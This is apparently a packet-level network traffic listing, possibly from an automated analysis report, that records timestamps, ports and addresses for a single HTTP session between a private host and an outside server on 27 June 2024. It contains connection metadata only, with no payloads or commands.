Jun 27, 2024 05:59:00.435327053 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.435348988 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.435362101 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.435389042 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.435399055 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.435467958 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.435482979 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.435497046 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.435512066 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.435522079 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.435548067 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.435595989 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.435794115 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.436460018 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.436499119 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.436526060 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.436543941 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.436568022 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.436584949 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.436672926 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.436687946 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.436727047 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.436745882 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.436784029 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.436825037 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.436841011 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.436855078 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.436863899 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.436868906 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.436875105 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.436886072 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.436893940 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.436934948 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.437107086 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.437120914 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.437135935 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.437159061 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.437170029 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.437227964 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.437242031 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.437267065 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.437290907 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.437340021 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.437354088 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.437369108 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.437385082 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.437393904 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.437400103 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.437410116 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.437416077 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.437423944 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.437443972 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.437458992 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.437608957 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.437623024 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.437637091 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.437647104 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.437659979 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.437661886 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.437674999 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.437685966 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.437693119 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.437695980 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.437710047 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.437712908 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.437758923 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.437774897 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.437998056 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438013077 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438026905 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438036919 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438047886 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438050032 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438062906 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438070059 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438077927 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438080072 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438093901 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438101053 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438122034 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438127041 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438416958 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438435078 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438447952 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438460112 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438462019 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438474894 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438477039 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438492060 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438494921 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438503981 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438508034 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438523054 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438524961 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438534021 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438538074 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438551903 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438585043 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438594103 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438751936 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438765049 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438790083 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438803911 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438810110 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438824892 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438838005 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438852072 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438864946 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438874960 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438877106 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438890934 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.438898087 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438908100 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.438929081 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.464853048 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.464889050 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.464903116 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.464951992 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.464986086 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.465008974 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.465023041 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.465037107 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.465051889 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.465065956 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.465095997 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.465248108 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.465262890 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.465280056 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.465290070 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.465323925 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.465392113 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.465405941 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.465419054 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.465435028 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.465435982 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.465447903 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.465487003 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.465517998 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.488809109 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.488857031 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.488872051 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.488900900 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.488925934 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.488970041 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.488985062 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.489025116 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.489067078 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.489080906 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.489094019 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.489120007 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.489131927 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.489187956 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.489202976 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.489217997 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.489242077 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.489280939 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.489373922 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.489388943 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.489403009 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.489419937 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.489428997 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.489435911 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.489455938 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.489484072 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.520761013 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.520807028 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.520811081 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.520824909 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.520862103 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.520870924 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.520914078 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.520929098 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.520944118 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.520955086 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.520965099 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.520987034 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.521032095 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.521074057 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.521188974 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.521228075 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.521265030 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.521281004 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.521306038 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.521316051 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.521399975 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.521414042 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.521429062 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.521442890 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.521455050 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.521481991 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.521550894 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.521564007 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.521589041 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.521614075 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.521639109 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.521653891 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.521697998 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.521783113 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.521799088 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.521814108 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.521821976 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.521828890 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.521846056 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.521861076 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.521872044 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.521939039 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.521953106 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.521991014 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.522026062 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.522041082 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.522056103 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.522063017 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.522089005 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.522273064 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.522288084 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.522303104 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.522317886 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.522330046 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.522341013 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.522367001 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.522382975 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.522397995 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.522422075 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.522430897 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.522489071 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.522504091 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.522519112 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.522527933 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.522533894 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.522541046 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.522562027 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.522569895 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.522650003 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.522689104 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.523478985 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.523541927 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.523556948 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.523581028 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.523592949 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.523761034 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.523777008 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.523791075 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.523807049 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.523816109 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.523821115 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.523833990 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.523839951 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.523843050 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.523864985 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.523878098 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.524020910 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.524035931 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.524049997 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.524056911 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.524060965 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.524069071 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.524074078 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.524097919 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.524111986 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.524288893 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.524302006 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.524316072 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.524327040 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.524331093 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.524339914 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.524347067 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.524358988 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.524363041 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.524373055 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.524415970 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.524434090 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.524609089 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.524625063 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.524638891 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.524652958 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.524665117 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.524666071 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.524677038 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.524682045 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.524697065 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.524698973 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.524710894 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.524724960 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.524744034 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.524919033 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.524935961 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.524974108 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.525073051 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.525096893 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.525106907 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.525111914 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.525126934 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.525132895 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.525142908 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.525151968 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.525160074 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.525166988 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.525177002 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.525182009 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.525193930 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.525202036 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.525211096 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.525213003 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.525227070 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.525238991 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.525258064 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.525280952 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.525573969 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.525589943 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.525604010 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.525619984 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.525629044 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.525640011 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.525660992 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.525752068 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.525768042 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.525783062 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.525791883 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.525799990 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.525805950 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.525825024 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.525835037 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.526149035 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.526164055 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.526179075 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.526190996 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.526201010 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.526213884 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.526232958 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.551733017 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.551779032 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.551794052 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.551794052 CEST	49748	80	192.168.2.7	77.91.77.81
